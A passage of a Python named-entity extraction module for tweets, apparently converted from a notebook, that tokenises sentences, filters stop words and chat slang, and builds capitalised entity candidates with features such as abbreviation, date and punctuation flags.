lways"]
prep_list=["in","at","of","on","with","by","&;"] #includes common conjunction as well
article_list=["a","an","the"]
day_list=["sunday","monday","tuesday","wednesday","thursday","friday","saturday","mon","tues","wed","thurs","fri","sat","sun"]
month_list=["january","february","march","april","may","june","july","august","september","october","november","december","jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"]
for item in tempList:
if item not in cachedStopWords:
cachedStopWords.append(item)
cachedStopWords.remove("don")
#cachedStopWords.remove("may")
cachedTitles = ["mr.","mr","mrs.","mrs","miss","ms","sen.","dr","dr.","prof.","president","congressman"]
chat_word_list=["please","4get","ooh","idk","oops","yup","stfu","uhh","2b","dear","yay","btw","ahhh","b4","ugh","ty","cuz","coz","sorry","yea","asap","ur","bs","rt","lfmao","slfmao","u","r","nah","umm","ummm","thank","thanks","congrats","whoa","rofl","ha","ok","okay","hey","hi","huh","ya","yep","yeah","fyi","duh","damn","lol","omg","congratulations","fuck","wtf","wth","aka","wtaf","xoxo","rofl","imo","wow","fck","haha","hehe","hoho"]
#string.punctuation.extend('“','’','”')
#---------------------Existing Lists--------------------
# In[300]:
class SatadishaModule():
def __init__(self):
print("hello")
#self.batch=batch
#self.batch=self.batch[:3000:]
self.counter=0
#self.extract()
def flatten(self,mylist, outlist,ignore_types=(str, bytes, int, ne.NE_candidate)):
if mylist !=[]:
for item in mylist:
#print not isinstance(item, ne.NE_candidate)
if isinstance(item, list) and not isinstance(item, ignore_types):
self.flatten(item, outlist)
else:
if isinstance(item,ne.NE_candidate):
item.phraseText=item.phraseText.strip(' \t\n\r')
item.reset_length()
else:
if type(item)!= int:
item=item.strip(' \t\n\r')
outlist.append(item)
return outlist
def normalize(self,word):
strip_op=word
strip_op=(((strip_op.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()).lower()
strip_op=(strip_op.lstrip('“‘’”')).rstrip('“‘’”')
#strip_op= self.rreplace(self.rreplace(self.rreplace(strip_op,"'s","",1),"’s","",1),"’s","",1)
if strip_op.endswith("'s"):
li = strip_op.rsplit("'s", 1)
return ''.join(li)
elif strip_op.endswith("’s"):
li = strip_op.rsplit("’s", 1)
return ''.join(li)
else:
return strip_op
#@profile
def extract(self,batch,batch_number):
#df = read_csv('eric_trump.csv', index_col='ID', header=0, encoding='utf-8')
print("Phase I extracting now")
time_in=time.time()
self.batch=batch
#output.csv
#df_out= DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'usertype', 'TweetSentence', 'phase1Candidates'))
self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','start_time','entry_batch','annotation'))
if(self.counter==0):
#self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','correct_candidates_tweet'))
#dict1 = {'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}
self.CTrie=trie.Trie("ROOT")
self.ME_EXTR=Mention.Mention_Extraction()
self.phase2stopWordList=[]
#self.df_out= pd.DataFrame({'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}, index=[0,])
#%%timeit -o
#module_capital_punct.main:
'''I am running this for 100 iterations for testing purposes. Of course you no longer need this for loop as you are
#running one tuple at a time'''
#if(self.counter==0):
#initializing candidateBase with a dummy node
#self.interCWSGap={}
#candidateBase={}
#NE_container=DataFrame(columns=('candidate', 'frequency', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'))
count=0
ne_count=0
userMention_count=0
#token_count=0
NE_list_phase1=[]
UserMention_list=[]
df_holder=[]
#--------------------------------------PHASE I---------------------------------------------------
for index, row in self.batch.iterrows():
now = datetime.datetime.now()
#now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
#hashtags=str(row['Discussion'])
hashtags=str(row['HashTags'])
user=str(row['User'])
#userType=str(row['User Type'])
tweetText=str(row['TweetText'])
#correct_candidates_tweet=str(row['Mentions'])
#print(str(index))
annot_raw=str(row['mentions_other'])
split_list=annot_raw.split(";")
#split_listFilter=list(filter(lambda element: element.strip()!='', split_list))
split_listFilter=list(filter(None, split_list))
#annotations in list of list structure
filtered_2_times=list(map(lambda element: list(filter(None, element.split(','))), split_list))
#capitalization module
#if all words are capitalized:
# print(index)
# if tweetText.isupper():
# print(index,tweetText)
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
# elif tweetText.islower():
# print(index,tweetText)
# print("",end="")
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
#else:
ne_List_final=[]
userMention_List_final=[]
#pre-modification: returns word list split at whitespaces; retains punctuation
tweetSentences=list(filter (lambda sentence: len(sentence)>1, tweetText.split('\n')))
tweetSentenceList_inter=self.flatten(list(map(lambda sentText: sent_tokenize(sentText.lstrip().rstrip()),tweetSentences)),[])
tweetSentenceList=list(filter (lambda sentence: len(sentence)>1, tweetSentenceList_inter))
#filtering nan values
if(len(filtered_2_times[0])==1):
if(filtered_2_times[0][0]=='nan'):
filtered_2_times[0]=[]
# print(index,filtered_2_times,tweetSentenceList)
for sen_index in range(len(tweetSentenceList)):
sentence=tweetSentenceList[sen_index]
# uncomment this
modified_annotations=[self.normalize(candidate)for candidate in filtered_2_times[sen_index]]
annotation=[]
for candidate in modified_annotations:
if(candidate=="nan"):
pass
else:
annotation.append(candidate)
# for i in filtered_2_times[sen_index]:
# if(i=="nan"):
#print(sentence)
#print(sen_index)
#tweetWordList= list(filter(lambda word:(word.strip(string.punctuation))!="",sentence.split()))
phase1Out=""
if((not tweetText.isupper()) &(not tweetText.islower())):
tempList=[]
tempWordList=sentence.split()
#print(tempWordList)
for word in tempWordList:
temp=[]
# if(temp1):
# temp=list(map(lambda elem: elem+'..', temp1[:-1]))
# temp.append(temp1[-1])
if (("?" in word)&(not word.endswith("?"))):
temp1=list(filter(lambda elem: elem!='',word.split("?")))
if(temp1):
temp=list(map(lambda elem: elem+'?', temp1[:-1]))
temp.append(temp1[-1])
elif ((":" in word)&(not word.endswith(":"))):
temp1=list(filter(lambda elem: elem!='',word.split(":")))
if(temp1):
temp=list(map(lambda elem: elem+':', temp1[:-1]))
temp.append(temp1[-1])
elif (("," in word)&(not word.endswith(","))):
#temp=list(filter(lambda elem: elem!='',word.split(",")))
temp1=list(filter(lambda elem: elem!='',word.split(",")))
if(temp1):
temp=list(map(lambda elem: elem+',', temp1[:-1]))
temp.append(temp1[-1])
elif (("/" in word)&(not word.endswith("/"))):
temp1=list(filter(lambda elem: elem!='',word.split("/")))
if(temp1):
temp=list(map(lambda elem: elem+'/', temp1[:-1]))
temp.append(temp1[-1])
elif "..." in word:
#print("here")
temp=list(filter(lambda elem: elem!='',word.split("...")))
# if(temp1):
# temp=list(map(lambda elem: elem+'...', temp1[:-1]))
# temp.append(temp1[-1])
elif ".." in word:
temp=list(filter(lambda elem: elem!='',word.split("..")))
#print(index, temp)
else:
#if word not in string.punctuation:
temp=[word]
if(temp):
tempList.append(temp)
tweetWordList=self.flatten(tempList,[])
#print(tweetWordList)
#token_count+=len(tweetWordList)
#returns position of words that are capitalized
#print(tweetWordList)
tweetWordList_cappos = list(map(lambda element : element[0], filter(lambda element : self.capCheck(element[1]), enumerate(tweetWordList))))
#print(tweetWordList_cappos)
#returns list of stopwords in tweet sentence
combined_list_here=([]+cachedStopWords+article_list+prep_list+chat_word_list)
#combined_list_here.remove("the")
tweetWordList_stopWords=list(filter(lambda word: ((word[0].islower()) & (((word.strip()).strip(string.punctuation)).lower() in combined_list_here))|(word.strip() in string.punctuation)|(word.startswith('@')), tweetWordList))
#returns list of @userMentions
userMentionswPunct=list(filter(lambda phrase: phrase.startswith('@'), tweetWordList))
userMentions=list(map(lambda mention: mention.rstrip(string.punctuation), userMentionswPunct))
userMention_count+=len(userMentions)
userMention_List_final+=userMentions
'''#function to process and store @ user mentions---- thread 1
#print(userMention_List_final)
threading.Thread(target=self.ME_EXTR.ComputeAll, args=(userMention_List_final,)).start()'''
#non @usermentions are processed in this function to find non @, non hashtag Entities---- thread 2
ne_List_allCheck=[]
#if(len(tweetWordList)>len(tweetWordList_cappos)):
#print(len(tweetWordList),str(len(tweetWordList_cappos)),str(len(tweetWordList_stopWords)))
if((len(tweetWordList))>(len(tweetWordList_cappos))):
#q = queue.Queue()
#threading.Thread(target=self.trueEntity_process, args=(tweetWordList_cappos,tweetWordList,q)).start()
ne_List_allCheck= self.trueEntity_process(tweetWordList_cappos,tweetWordList)
#ne_List_allCheck= q.get()
ne_count+=len(ne_List_allCheck)
ne_List_final+=ne_List_allCheck
#write row to output dataframe
if(len(tweetWordList)==len(tweetWordList_cappos)):
phase1Out="nan"
if(len(ne_List_allCheck)>0):
for candidate in ne_List_allCheck:
position = '*'+'*'.join(str(v) for v in candidate.position)
position=position+'*'
candidate.set_sen_index(sen_index)
phase1Out+=(((candidate.phraseText).lstrip(string.punctuation)).strip())+ '::'+str(position)+"||"
else:
phase1Out="nan"
#print(self.df_out.columns)
dict1 = {'tweetID':str(index), 'sentID':str(sen_index), 'hashtags':hashtags, 'user':user, 'TweetSentence':sentence, 'phase1Candidates':phase1Out,'start_time':now,'entry_batch':batch_number,'annotation':annotation}
df_holder.append(dict1)
#self.df_out.append(outrow)
#self.df_out=self.df_out.append(outrow,ignore_index=True)
for candidate in ne_List_final:
#self.insert_dict (candidate,self.NE_container,candidateBase,index,candidate.sen_index,batch_number)
candidateText=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
candidateText=(candidateText.lstrip('“‘’”')).rstrip('“‘’”')
candidateText= self.rreplace(self.rreplace(self.rreplace(candidateText,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
if not ((candidateText in combined)|(candidateText.isdigit())|(self.is_float(candidateText))):
self.CTrie.__setitem__(candidateText.split(),len(candidateText.split()),candidate.features,batch_number)
if(index==191):
print(sentence)
self.printList(ne_List_final)
#if(userMention_List_final):
# print(userMention_List_final)
NE_list_phase1+=ne_List_final
UserMention_list+=userMention_List_final
#print ("\n")
#fieldnames=['candidate','freq','length','cap','start_of_sen','abbrv','all_cap','is_csl','title','has_no','date','is_apostrp','has_inter_punct','ends_verb','ends_adverb','change_in_cap','topic_ind','entry_time','entry_batch','@mention']
#updated_NE_container=[]
'''#Updating trie with @mention info
self.CTrie.updateTrie("",self.ME_EXTR)'''
time_out=time.time()
#for display purposes Iterating through the trie
'''candidateBase= self.CTrie.__iter__()
for node in candidateBase:
print(node)'''
'''for key in self.NE_container.keys():
val=self.NE_container[key]+[str(ME_EXTR.checkInDictionary(key))]
#index+=1
#updated_NE_container[key]=val
dict1 = {'candidate':key, 'freq':val[0],'length':val[1],'cap':val[2],'start_of_sen':val[3],'abbrv':val[4],'all_cap':val[5],'is_csl':val[6],'title':val[7],'has_no':val[8],'date':val[9],'is_apostrp':val[10],'has_inter_punct':val[11],'ends_verb':val[12],'ends_adverb':val[13],'change_in_cap':val[14],'topic_ind':val[15],'entry_time':val[16],'entry_batch':val[17],'@mention':val[18]}
updated_NE_container.append(dict1)'''
'''with open('candidate_base.csv', 'w') as output_candidate:
#with open('candidates.csv', 'w') as output_candidate:
writer = csv.writer(output_candidate)
writer.writerow(fieldnames)
for k, v in updated_NE_container.items():
writer.writerow([k] + v)'''
#print("Total number of tokens processed: "+str(token_count))
#print ("Total number of candidate NEs extracted: "+str(len(candidateBase)))
#print(self.NE_container.items())
#freqs=pd.read_csv('candidate_base.csv', encoding = 'utf-8',delimiter=',')
#freqs = pd.DataFrame(updated_NE_container, columns=fieldnames)
#freqs = pd.DataFrame()
#freqs=pd.DataFrame(list(self.NE_container.items()), orient='index')#columns=fieldnames)
self.append_rows(df_holder)
self.counter=self.counter+1
#return (copy.deepcopy(self.df_out),copy.deepcopy(freqs),time_in,time_out)
return (self.df_out,self.CTrie,time_in,time_out,self.phase2stopWordList)
#return sorted_candidateBase
#@profile
def append_rows(self,df_holder):
df = pd.DataFrame(df_holder)
self.df_out=self.df_out.append(df)
self.df_out.to_csv('tweet_base.csv' ,sep=',', encoding='utf-8')
def rreplace(self,s, old, new, occurrence):
if s.endswith(old):
li = s.rsplit(old, occurrence)
return new.join(li)
else:
return s
def stopwordReplace(self, candidate):
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
if(candidate.features[ne.is_quoted]):
words=self.normalize(candidate.phraseText).split()
flag=False
swList=[]
for word in words:
if(word in combined):
swList.append(word)
else:
flag=True
#print(candidate.phraseText,swList,flag)
if(flag):
self.phase2stopWordList=list(set(self.phase2stopWordList)|set(swList))
#self.phase2stopWordList.extend(swList)
else:
candidate.phraseText=""
return candidate
wordlist=list(filter(lambda word: word!='', candidate.phraseText.split()))
pos=candidate.position
#print(candidate.phraseText,wordlist,pos)
start=0
flag=False
while(start!=len(pos)):
if(wordlist[start].lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined):
#flag=True
break
start+=1
end=len(pos)-1
while(end>=0):
#print(wordlist[end])
if(wordlist[end].lstrip(string.punctuation).rstrip(string.punctuation).strip() not in combined):
#flag=True
break
end-=1
#print(start,end)
updated_pos=pos[start:(end+1)]
updated_phrase=' '.join(wordlist[start:(end+1)])
#print(updated_pos,updated_phrase)
candidate.phraseText=updated_phrase
candidate.position=updated_pos
return candidate
# In[301]:
#candidate: 'frequency','length', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'
def is_float(self,string):
try:
f=float(string)
if(f==0.0):
return True
else:
return ((f) and (string.count(".")==1))
#return True# True if string is a number with a dot
except ValueError: # if string is not a number
return False
def insert_dict(self,candidate,NE_container,candidateBase,tweetID,sentenceID,batch):
key=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
key=(key.lstrip('“‘’”')).rstrip('“‘’”')
key= self.rreplace(self.rreplace(self.rreplace(key,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
try:
if ((key in combined)|(key.isdigit())|(self.is_float(key))):
return
except TypeError:
print(key)
tweetID=str(tweetID)
sentenceID=str(sentenceID)
if key in self.NE_container:
feature_list=self.NE_container[key]
feature_list[0]+=1
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
else:
now = datetime.datetime.now()
now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
feature_list=[0]*17
feature_list[0]+=1
feature_list[1]=candidate.length
#call background process to check for non capitalized occurences
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
feature_list.append(now)
feature_list.append(batch)
self.NE_container[key] = feature_list
#insert in candidateBase
'''if key in candidateBase.keys():
#candidateBase[key]=candidateBase[key]+[str(tweetID)+":"+str(sentenceID)]
if(tweetID in candidateBase[key]):
if(sentenceID in candidateBase[key][tweetID] ):
candidateBase[key][tweetID][sentenceID]=candidateBase[key][tweetID][sentenceID]+1
else:
candidateBase[key][tweetID][sentenceID]=1
else:
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1
#c=[(y,str(idx)) for idx,y in enumerate( a) if y not in b]
#candidateBase[key]
else:
#candidateBase[key]=[str(tweetID)+":"+str(sentenceID)]
candidateBase[key]={}
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1'''
return
# In[302]:
def printList(self,mylist):
print("["),
#print "[",
for item in mylist:
if item != None:
if isinstance(item,ne.NE_candidate):
item.print_obj()
#print (item.phraseText)
else:
print (item+",", end="")
#print item+",",
#print "]"
print("]")
return
# In[303]:
# In[304]:
def consecutive_cap(self,tweetWordList_cappos,tweetWordList):
output=[]
#identifies consecutive numbers in the sequence
#print(tweetWordList_cappos)
for k, g in groupby(enumerate(tweetWordList_cappos), lambda element: element[0]-element[1]):
output.append(list(map(itemgetter(1), g)))
count=0
if output:
final_output=[output[0]]
for first, second in (zip(output,output[1:])):
#print(first,second)
#print(tweetWordList[first[-1]])
if ((not (tweetWordList[first[-1]]).endswith('"'))&((second[0]-first[-1])==2) & (tweetWordList[first[-1]+1].lower() in prep_list)):
(final_output[-1]).extend([first[-1]+1]+second)
elif((not (tweetWordList[first[-1]].endswith('"')))&((second[0]-first[-1])==3) & (tweetWordList[first[-1]+1].lower() in prep_list)& (tweetWordList[first[-1]+2].lower() in article_list)):
(final_output[-1]).extend([first[-1]+1]+[first[-1]+2]+second)
else:
final_output.append(second)
#merge_positions.append(False)
else:
final_output=[]
return final_output
# In[305]:
#basically splitting the original NE_candidate text and building individual object from each text snippet
def build_custom_NE(self,phrase,pos,prototype,feature_index,feature_value):
#print("Enters")
position=pos
custom_NE= ne.NE_candidate(phrase,position)
for i in range(15):
custom_NE.set_feature(i,prototype.features[i])
custom_NE.set_feature(feature_index,feature_value)
if (feature_index== ne.is_csl) & (feature_value== True):
custom_NE.set_feature(ne.start_of_sentence, False)
custom_NE=self.entity_info_check(custom_NE)
return custom_NE
# In[306]:
def abbrv_algo(self,ne_element):
'''abbreviation algorithm
trailing apostrophe:
|period:
| multiple letter-period sequence:
| all caps
| non period:
| ?/! else drop apostrophe
else:
unchanged
'''
phrase= ne_element.phraseText
#print("=>"+phrase)
#since no further split occurs we can set remaining features now
ne_element.set_feature(ne.capitalized, True)
if ne_element.phraseText.isupper():
ne_element.set_feature(ne.all_capitalized, True)
else:
ne_element.set_feature(ne.all_capitalized, False)
abbreviation_flag=False
p=re.compile(r'[^a-zA-Z\d\s]$')
match_list = p.findall(phrase)
if len(match_list)>0:
#print("Here")
if phrase.endswith('.'):
#print("Here")
p1= re.compile(r'([a-zA-Z][\.]\s*)')
match_list = p1.findall(phrase)
if ((len(match_list)>1) & (len(phrase)<6)):
#print ("1. Found abbreviation: "+phrase)
abbreviation_flag= True
else:
if (phrase[-2]!=' '):
phrase= phrase[:-1]
else:
#if phrase.endswith(string.punctuation):
if (phrase[-2]!=' '):
phrase= phrase[:-1]
#if not (phrase.endswith('?')|phrase.endswith('!')|phrase.endswith(')')|phrase.endswith('>')):
#phrase= phrase[:-1]
else:
p2=re.compile(r'([^a-zA-Z0-9_\s])')
match_list = p2.findall(phrase)
if ((len(match_list)==0) & (phrase.isupper()) & (len(phrase)<7)& (len(phrase)>1)):
#print ("2. Found abbreviation!!: "+phrase)
abbreviation_flag= True
else:
#print("Here-> "+phrase)
p3= re.compile(r'([A-Z][.][A-Z])')
p4= re.compile(r'\s')
match_list = p3.findall(phrase)
match_list1 = p4.findall(phrase)
if ((len(match_list)>0) & (len(match_list1)==0)):
abbreviation_flag= True
#print ("3. Found abbreviation!!: "+phrase)
#element= ne.NE_candidate(phrase.strip())
ne_element.phraseText=phrase
ne_element.reset_length()
ne_element.set_feature(ne.abbreviation, abbreviation_flag)
return ne_element
# In[307]:
def punct_clause(self,NE_phrase_in):
NE_phrases=self.entity_info_check(NE_phrase_in)
cap_phrases=NE_phrases.phraseText.strip()
final_lst=[]
#print (cap_phrases,NE_phrases.features[ne.date_indicator])
if (re.compile(r'[^a-zA-Z0-9_\s]')).findall(cap_phrases):
#case of intermediate punctuations: handles abbreviations
p1= re.compile(r'(?:[a-zA-Z0-9][^a-zA-Z0-9_\s]\s*)')
match_lst = p1.findall(cap_phrases)
#print(match_lst)
if match_lst:
index= (list( p1.finditer(cap_phrases) )[-1]).span()[1]
p= re.compile(r'[^a-zA-Z\d\s]')
match_list = p.findall(cap_phrases)
p2=re.compile(r'[^a-zA-Z\d\s]$') #ends with punctuation
if ((len(match_list)>0)&(len(match_lst)>0)&((len(match_list)-len(match_lst))>0)):
if (p2.findall(cap_phrases)):
#only strips trailing punctuations, not intermediate ones following letters
cap_phrases = cap_phrases[0:index]+re.sub(p, '', cap_phrases[index:])
NE_phrases.phraseText= cap_phrases
#comma separated NEs
#lst=filter(lambda(word): word!="", re.split('[,]', cap_phrases))
#print ("=>"+ cap_phrases)
start_of_sentence_fix=NE_phrases.features[ne.start_of_sentence]
#temp=re.split("\...", cap_phrases)
#inter=self.flatten(list(map(lambda elem: re.split('[,:!…]',elem),temp)),[])
#print("'''",inter)
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
splitList=re.split('["‘’“”()/,;:!?…]',cap_phrases)
splitList=list(filter(lambda word: ((word!="")&(word.lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined)), splitList))
#print("==",splitList)
wordlstU=list(map(lambda word: word.strip().strip(string.punctuation), splitList))
wordlstU=list(filter(lambda word: word!="", wordlstU))
wordlst=list(filter(lambda word: ((word.strip().strip(string.punctuation))[0].isupper()|(word.strip().strip(string.punctuation))[0].isdigit()), wordlstU))
#print(":::",wordlst)
if ((NE_phrases.features[ne.date_indicator]==False)):
#print("hehe")
if(len(splitList)>1):
if(len(wordlst)>0):
#print("here::")
pos=NE_phrases.position
combined=[]
prev=0
for i in range(len(wordlst)):
word=wordlst[i]
word_len=len(list(filter(lambda individual_word: individual_word!="", re.split('[ ]', word))))
word_pos=pos[(prev):(prev+word_len)]
prev=prev+word_len
combined+=[[word]+word_pos]
lst_nsw=list(filter(lambda element: (((str(element[0])).strip(string.punctuation).lower() not in combined)& (not (str(element[0])).strip(string.punctuation).isdigit()) & (len(str(element[0]))>1)) ,combined))
#print ("++",lst_nsw)
if(lst_nsw):
final_lst= list(map(lambda element:self.build_custom_NE(str(element[0]),element[1:],NE_phrases,ne.is_csl,True), lst_nsw))
final_lst[0].set_feature(ne.start_of_sentence, NE_phrases.features[ne.start_of_sentence])
else:
final_lst=[]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
#check abbreviation
#print("++",final_lst)
if(final_lst):
final_lst= list(map(lambda phrase: self.abbrv_algo(phrase), final_lst))
#print(lst)
return final_lst
# In[308]:
#%%timeit -o
def f(self,y,sflag,quoteFlag,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#print(sflag)
if sflag:
left=""
right=""
lp=(-1)
rp=(-1)
i=0
j=len(y)-1
flag1=False
flag2=False
x=[]
while (((flag1==False)|(flag2==False))&((j-i)>0)):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(flag1,flag2)
#if((flag1==False)|(flag2==False)):
# while (((j-i)!=0)|((flag1==False)|(flag2==False))):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print(left)
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(lp,rp)
if(lp==rp):
if(lp!=-1):
x=[y[lp]]
else:
x=y[lp:(rp+1)]
else:
x=y
#print(x)
if(x):
list1=list(map(lambda word: tweetWordList[word], x))
phrase=" ".join(e for e in list1)
#print(phrase)
phrase1="".join(list1)
#if not ((phrase[0].isdigit()) & (len(x)==1)):
if not (phrase1.strip().isdigit()):
NE_phrase= ne.NE_candidate(phrase.strip(),x)
if 0 in x:
NE_phrase.set_feature(ne.start_of_sentence,True)
else:
NE_phrase.set_feature(ne.start_of_sentence,False)
NE_phrase.set_feature(ne.is_quoted,quoteFlag)
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
#print("====>>",NE_phrase.phraseText)
return NE_phrase
# In[309]:
def capCheck(self,word):
combined_list=[]+cachedStopWords+prep_list+chat_word_list+article_list
if word.startswith('@'):
return False
elif "<Hashtag" in word:
return False
#elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower() in combined_list:
elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)) in combined_list:
# if((word=="The")|(word=="THE")):
# return True
# else:
return True
elif word[0].isdigit():
return True
else:
p=re.compile(r'^[\W]*[A-Z]')
l= p.match(word)
if l:
return True
else:
return False
# In[310]:
def title_check(self,ne_phrase):
title_flag=False
words=ne_phrase.phraseText.split()
for word in words:
if word.lower() in cachedTitles:
title_flag= True
break
ne_phrase.set_feature(ne.title,title_flag)
return ne_phrase
# In[311]:
def entity_info_check(self,ne_phrase):
flag1=False #has number
flag3=False
flag_ind=[] #is number
month_ind=[]
date_num_holder=[]
words=ne_phrase.phraseText.split()
for word in words:
word=(word.strip()).rstrip(string.punctuation).lower()
punct_flag=False
for char in word:
if ((char in string.punctuation)|(char in ['“','‘','’','”','…'])):
punct_flag=True
break
#if ((not word.isalpha())& (not "'s" in word) & (not "’s" in word)):'‘“"’”
if ((not word.isalpha())& (not punct_flag)):
flag_ind+=[True]
if word.isdigit():
date_num_holder+=['num']
else:
date_num_holder+=['alpha']
else:
flag_ind+=[False]
if word in month_list:
month_ind+=[True]
date_num_holder+=['month']
elif word in day_list:
date_num_holder+=['day']
elif word in prep_list:
date_num_holder+=['preposition']
elif word in article_list:
date_num_holder+=['article']
else:
#print("=>"+word)
date_num_holder+=['string']
if True in flag_ind:
flag1=True
if True in month_ind:
flag3=True
ne_phrase.set_feature(ne.has_number,flag1)
ne_phrase.set_feature(ne.date_indicator,flag3)
ne_phrase.set_date_num_holder(date_num_holder)
return ne_phrase
# In[312]:
#removing commonly used expletives, enunciated chat words and other common words (like days of the week, common expressions)
def slang_remove(self,ne_phrase):
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
p1= re.compile(r'([A-Za-z]+)\1\1{1,}')
match_lst = p1.findall(phrase)
if phrase in article_list:
return True
elif phrase in day_list:
return True
#elif phrase in month_list:
#return True
elif match_lst:
return True
else:
return False
# In[313]:
def apostrope_check(self,ne_phrase):
apostrophe="'s"
bad_apostrophe="’s"
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
if (apostrophe in phrase):
if (phrase.endswith(apostrophe)):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(apostrophe))
elif (bad_apostrophe in phrase):
if phrase.endswith(bad_apostrophe):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(bad_apostrophe))
else:
ne_phrase.set_feature(ne.is_apostrophed,-1)
return ne_phrase
# In[314]:
def punctuation_check(self,ne_phrase):
holder=[]
punctuation_holder=[]
flag_holder=[]
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
for i in range(len(phrase)):
if (phrase[i] in string.punctuation):
holder+=[i]
for i in holder:
if ((i<(len(phrase)-1)) & (phrase[i]=="'") & (phrase[i+1]=="s")):
flag_holder+=[False]
elif ((i==(len(phrase)-1)) & (phrase[i]=="'")):
flag_holder+=[False]
else:
flag_holder+=[True]
punctuation_holder+=[i]
#print(flag_holder)
ne_phrase.set_punctuation_holder(punctuation_holder)
if True in flag_holder:
ne_phrase.set_feature(ne.has_intermediate_punctuation,True)
else:
ne_phrase.set_feature(ne.has_intermediate_punctuation,False)
return ne_phrase
# In[315]:
def tense_check(self,ne_phrase):
words=(((ne_phrase.phraseText.strip()).rstrip(string.punctuation)).lower()).split()
verb_flag=False
adverb_flag=False
if (len(words)==1):
if words[0].endswith("ing"):
verb_flag=True
if words[0].endswith("ly"):
adverb_flag=True
ne_phrase.set_feature(ne.ends_like_verb,verb_flag)
ne_phrase.set_feature(ne.ends_like_adverb,adverb_flag)
return ne_phrase
# In[316]:
def capitalization_change(self,ne_element):
phrase=((ne_element.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()
val=-1
topic_indicator=False
p1= re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+[A-Za-z]+') #BREAKING: Toronto Raptors
p2= re.compile(r'([A-Z]{1}[a-z]+)+[^A-Za-z]*\s+[A-Z]{4,}') #The DREAMIEST LAND
match_lst1 = p1.findall(phrase)
match_lst2 = p2.findall(phrase)
if (match_lst1):
if not phrase.isupper():
p3=re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+')
val=list(p3.finditer(phrase))[-1].span()[1]
if(":" in phrase):
